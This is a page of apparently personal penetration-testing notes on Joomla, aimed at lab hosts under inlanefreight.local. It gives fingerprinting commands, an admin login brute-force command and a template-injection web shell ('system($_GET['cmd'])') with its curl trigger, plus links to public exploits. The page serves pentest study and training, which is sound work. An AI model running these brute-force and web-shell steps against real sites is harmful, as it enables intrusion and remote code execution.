πŸ““
Sfoffo - Pentesting Notes
View on GitHub
  • 🏠/home/sfoffo/.pt-notes
  • 🏳️Contributions
    • 2024 Contributions
      • CVE-2024-42845
      • CVE-2024-41819
      • CVE-2024-41943
      • CVE-2024-50344
  • πŸ€Support this Project
  • πŸ“‚Active Directory
    • Initial Access
    • Internal Enumeration & Lateral Movement
    • Privilege Escalation to Domain Admin using Known Exploits
    • Domain Trusts
  • 🐧Linux Privilege Escalation
    • Enumerating Attack Vectors
    • Privileged Groups
    • Environment Variables Abuse
    • Capabilities Abuse
    • Programs, Jobs and Services
    • Miscellaneous Techniques
    • Recent CVEs
  • πŸͺŸWindows Privilege Escalation
    • Enumerating Attack Vectors
    • Excessive User Rights Abuse
    • Built-in Groups Abuse
    • File System ACLs
    • Services Hijacking
    • User Account Control (UAC) Bypass
    • Living off the Land
  • πŸ›Bug Bounty Hunting
    • Bug Bounty Tools
  • πŸ•ΈοΈWeb Applications
    • Web Attacks
      • Cross Site Scripting (XSS)
      • SQL Injection (SQLi)
      • File Upload Vulnerabilities
      • Insecure Direct Object References (IDOR)
      • OS Command Injection
      • Local File Inclusion (LFI)
      • Remote File Inclusion (RFI)
      • XML External Entities (XXE)
      • HTTP Verb Tampering
    • Web Technologies
      • Tomcat
      • CGI Applications
      • WordPress
      • WebDav
      • Microsoft IIS
      • SAP Netweaver
      • Joomla
      • Drupal
      • Gitlab
      • Jenkins
      • osTicket
      • PRTG Network Monitor
      • Splunk
    • Fuzzing
  • πŸ”Information Gathering
  • πŸ“œProtocols and Services
    • DNS
    • FTP
    • IMAP
    • IPMI
    • MSSQL
    • MySQL
    • NFS
    • Oracle TNS
    • POP3
    • RDP
    • SMB
    • SMTP
    • SNMP
  • πŸ‘ΎUtilities, Scripts and Payloads
    • Shells and Payloads
    • Metasploit Framework
    • File Transfers
    • Pivoting, Tunneling, Port Forwarding
    • Password Attacks
Powered by GitBook
On this page
  • Introduction
  • Joomla Discovery/Footprinting
  • Joomla Users and Login Bruteforcing
  • Joomla Known Vulnerabilities

Was this helpful?

Edit on GitHub
  1. Web Applications
  2. Web Technologies

Joomla

Last updated 1 year ago

Was this helpful?

Introduction

  • CMS used for discussion forums, photo galleries, e-Commerce, user-based communities, and more.

  • Written in PHP and uses MySQL in the backend.


Joomla Discovery/Footprinting

Command
Description

droopescan scan joomla --url http://dev.inlanefreight.local

Enumeration via droopescan

python2.7 joomlascan.py -u http://dev.inlanefreight.local

Enumeration via joomlascan.py

curl -s http://dev.inlanefreight.local/ | grep Joomla

Check Webpage Source

curl -s http://dev.inlanefreight.local/administrator/manifests/files/joomla.xml | xmllint --format -

Some Joomla versions may be fingerprinted from this file

Browse to http://dev.inlanefreight.local/plugins/system/cache/cache.xml

The cache.xml file can give out an approximate version of Joomla

Browse to http://dev.inlanefreight.local/media/system/js/

Some versions of Joomla can be fingerprinted by analyzing the javascript files in this folder

Browse to http://blog.inlanefreight.local/robots.txt

Check for references to Joomla

Browse to http://dev.inlanefreight.local/README.txt

Check the README file to look for references to Joomla


Joomla Users and Login Bruteforcing

  • Administrator account: The default administrator account is admin, but the password is set at install time

  • You can perform login broteforce by using the following:

  • PoC: sudo python3 joomla-brute.py -u http://dev.inlanefreight.local -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin


Joomla Known Vulnerabilities

  1. PHP TEMPLATE CODE INJECTION TO RCE [Requires Admin Account]

    • The basic idea is to add PHP code inside a template

    • Login as Admin β†’ Navigate to Configuration β†’ Select a Template β†’ Select an existing PHP file β†’ add the following payload:

    • system($_GET['cmd']);

    • curl -s http://dev.inlanefreight.local/templates/protostar/error.php?cmd=id

    • Exploit 1: https://www.exploit-db.com/exploits/46710

    • Exploit 2: https://github.com/dpgg101/CVE-2019-10945

Joomla 3.9.4 directory traversal

πŸ•ΈοΈ
https://github.com/ajnik/joomla-bruteforce
CVE-2019-10945